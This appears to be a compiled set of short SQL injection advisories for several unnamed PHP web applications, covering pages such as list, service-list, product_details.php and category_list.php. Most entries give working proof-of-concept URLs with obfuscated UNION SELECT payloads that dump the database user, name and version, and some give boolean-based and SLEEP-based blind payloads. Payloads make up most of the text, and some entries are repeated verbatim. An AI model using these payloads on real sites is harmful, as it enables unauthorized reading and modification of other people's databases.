The vulnerability allows an attacker to inject sql commands into the 'city' parameter of the 'list' page, which can be used to access or modify data in the back-end database.
The vulnerability allows an attacker to inject sql commands.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/list?city=[SQL]&main_search='+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/service-list?city=[SQL]&main_search='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/service-list?city=[SQL]&main_search='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/category_list.php?search=[SQL] Parameter: search (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: search=s%' AND 2775=2775 AND '%'=' Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: search=s%' AND SLEEP(5) AND '%'='
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: 1) http://localhost/[PATH]/list?gender=[SQL]&main_search='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- 2) http://localhost/[PATH]/list?city=[SQL]&main_search='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: http://localhost/[PATH]/product_details.php?id=[SQL] -348'++/*!13337UNION*/+/*!13337SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+-- http://server/product_details.php?id=-348'++/*!13337UNION*/+/*!13337SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+--
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/product-category.php?key=[SQL] Parameter: key (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: key=a%' AND 5436=5436 AND '%'='
The vulnerability allows an attacker to inject sql commands by manipulating the 'subcatid' and 'popcourseid' parameters in the 'courselist.php' script. An attacker can use boolean-based blind and AND/OR time-based blind payloads to exploit the vulnerability.